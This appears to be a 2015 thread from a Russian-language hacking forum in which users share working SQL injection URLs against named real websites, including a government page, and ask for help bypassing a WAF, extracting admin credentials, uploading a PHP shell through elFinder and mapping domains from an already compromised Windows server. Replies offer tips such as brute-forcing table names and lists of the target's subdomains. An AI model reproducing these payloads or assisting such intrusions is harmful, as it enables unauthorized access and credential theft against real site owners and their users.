ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.08.2015, 15:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
404
Репутация:
0
|
|
Код:
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти? |
|
|
|
10.08.2015, 17:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
Код:
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
|
|
|
|
10.08.2015, 17:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Unknowhacker
Unknowhacker said:
↑
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
Код:
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
|
|
|
11.08.2015, 02:14
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от djon
djon said:
↑
Нашел такое
www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&p wd=123123&fn=1
это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"
test@mail.ru
","nickname":"test","profileId":"6434","password": "7534534583eeffa8377c4d","freeze":"0","opo_userid" :"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так
тут будет форма
({"email":"
test@mail.ru
","nickname":"test","profileId":"6434","password": "7534534583eeffa8377c4d","freeze":"0","opo_userid" :"133"})
И ява скрипты не исполняются почему то.
Что можно с этим сделать? Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.
Сообщение от Pro100Nyan
Pro100Nyan said:
↑
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?
Сообщение от Chudak
Chudak said:
↑
Код:
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти? Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
|
|
|
|
11.08.2015, 03:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
1367
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
↑
Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками? которые dns, те что сайты)
|
|
|
|
11.08.2015, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
5407
Репутация:
0
|
|
Нашел вот такую уязвимость
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--
Нашел username,password но админку так и не смог найти((
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--
Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему |
|
|
|
11.08.2015, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от blackhead
blackhead said:
↑
Нашел вот такую уязвимость
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--
Нашел username,password но админку так и не смог найти((
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--
Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему
|
|
|
|
11.08.2015, 20:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же...
|
|
|
|
11.08.2015, 20:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть
phpmyadmin.oscar-k.dk
content.oscar-k.dk
ftp://ftp.oscar-k.dk
|
|
|
|
11.08.2015, 20:53
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от Muracha
Muracha said:
↑
В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же... Проверьте, не фильтрует ли конструкцию
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
